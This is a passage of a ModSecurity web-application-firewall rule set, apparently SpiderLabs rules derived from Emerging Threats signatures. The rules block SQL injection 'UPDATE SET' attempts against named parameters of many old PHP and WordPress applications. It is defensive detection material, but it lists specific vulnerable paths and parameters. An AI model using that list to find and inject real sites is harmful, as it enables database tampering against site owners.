Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011835) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OvBB admincp.php smilieid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /admincp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011835,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OvBB admincp.php smilieid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains section=smilies" "chain" SecRule REQUEST_LINE "@contains action=edit" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:smilieid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OvBB admincp.php smilieid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011841) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Fusion mguser fotoalbum album_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /infusions/mg_user_fotoalbum_panel/mg_user_fotoalbum.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011841,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Fusion mguser fotoalbum album_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:album_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Fusion mguser fotoalbum album_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DBHcms editmenu Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011879,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS DBHcms editmenu Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:editmenu/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DBHcms editmenu Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011934) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Interactive Web Solutions site_info.php UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /site_info.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011934,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Interactive Web Solutions site_info.php UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:siid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Interactive Web Solutions site_info.php UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011947) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GeekLog filemgt UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /filemgmt/singlefile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011947,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS GeekLog filemgt UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:lid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GeekLog filemgt UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012005) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS digiSHOP cart.php UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /cart.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012005,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS digiSHOP cart.php UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains m=features" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS digiSHOP cart.php UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012020) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DVD Rental Software cat_id parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012020,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS DVD Rental Software cat_id parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains view=catalog" "chain" SecRule REQUEST_LINE "@contains item_type=M" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DVD Rental Software cat_id parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012030) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Pre Online Tests Generator Pro UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /takefreestart.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012030,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Pre Online Tests Generator Pro UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:tid2/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Pre Online Tests Generator Pro UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012038) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eNdonesia artid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /mod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012038,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS eNdonesia artid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains mod=publisher" "chain" SecRule REQUEST_LINE "@contains op=printarticle" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:artid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eNdonesia artid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012163) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Informacion General informacion_general.php UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /informacion_general.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012163,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Informacion General informacion_general.php UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Informacion General informacion_general.php UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012215) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tunngavik CMS id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /program/moduler_banner_aabn.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012215,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Tunngavik CMS id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tunngavik CMS id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012342) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-fusion Team Structure Infusion team_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /infusions/teams_structure/team.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012342,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-fusion Team Structure Infusion team_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:team_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-fusion Team Structure Infusion team_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012350) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMB Services id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012350,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PMB Services id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains lvl=coll_see" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMB Services id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012363) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS T-Content Management System id_novedad Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /notaevento.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012363,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS T-Content Management System id_novedad Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id_novedad/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS T-Content Management System id_novedad Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012368) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Bexfront sid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /bexfront.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012368,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Bexfront sid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Bexfront sid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012378) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board katid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /hilfsmittel.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012378,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board katid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains action=read" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:katid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board katid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012417) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012417,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:post_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012425) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SOPHIA CMS SQL Injection Attempt -- dsp_page.cfm pageid UPDATE SecRule REQUEST_LINE "@contains /dsp_page.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012425,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS SOPHIA CMS SQL Injection Attempt -- dsp_page.cfm pageid UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:pageid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SOPHIA CMS SQL Injection Attempt -- dsp_page.cfm pageid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012436) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012436,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:topic/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012473) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS All In One Control Panel SQL Injection Attempt -- cp_menu_data_file.php menu UPDATE SecRule REQUEST_LINE "@contains /public/code/cp_menu_data_file.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012473,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS All In One Control Panel SQL Injection Attempt -- cp_menu_data_file.php menu UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:menu/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS All In One Control Panel SQL Injection Attempt -- cp_menu_data_file.php menu UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012482) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012482,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:gall_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012490) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Keynect Ecommerce SQL Injection Attempt -- products.php ctf UPDATE SecRule REQUEST_LINE "@contains /products.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012490,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Keynect Ecommerce SQL Injection Attempt -- products.php ctf UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:ctf/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Keynect Ecommerce SQL Injection Attempt -- products.php ctf UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012560) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Shape Web Solutions imprimir.php UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /imprimir.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012560,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Shape Web Solutions imprimir.php UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Shape Web Solutions imprimir.php UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012570) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS coRED CMS rubID Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /content/rubric/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012570,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS coRED CMS rubID Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:rubID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS coRED CMS rubID Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012580) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE SecRule REQUEST_LINE "@contains /web/classes/autocomplete.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012580,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:field/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012600) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE SecRule REQUEST_LINE "@contains /web/classes/autocomplete.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012600,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:field/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012677) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Andy PHP Knowledgebase SQL Injection Attempt pdfgen.php pdfa UPDATE SecRule REQUEST_LINE "@contains /plugins/pdfClasses/pdfgen.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012677,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Andy PHP Knowledgebase SQL Injection Attempt pdfgen.php pdfa UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:pdfa/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Andy PHP Knowledgebase SQL Injection Attempt pdfgen.php pdfa UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012655) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke Surveys pollID parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /modules/Surveys/modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012655,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke Surveys pollID parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains name=Surveys" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:pollID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke Surveys pollID parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012665) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vBulletin cChatBox messageid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /cchatbox.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012665,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS vBulletin cChatBox messageid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,46635'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:messageid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vBulletin cChatBox messageid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012702) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eGroupware loaddetails.php script UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /samples/with_db/loaddetails.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012702,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS eGroupware loaddetails.php script UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eGroupware loaddetails.php script UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012719) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS I-Escorts Directory country_id parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /country_escorts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012719,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS I-Escorts Directory country_id parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:country_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS I-Escorts Directory country_id parameter UPDATE SET SQL 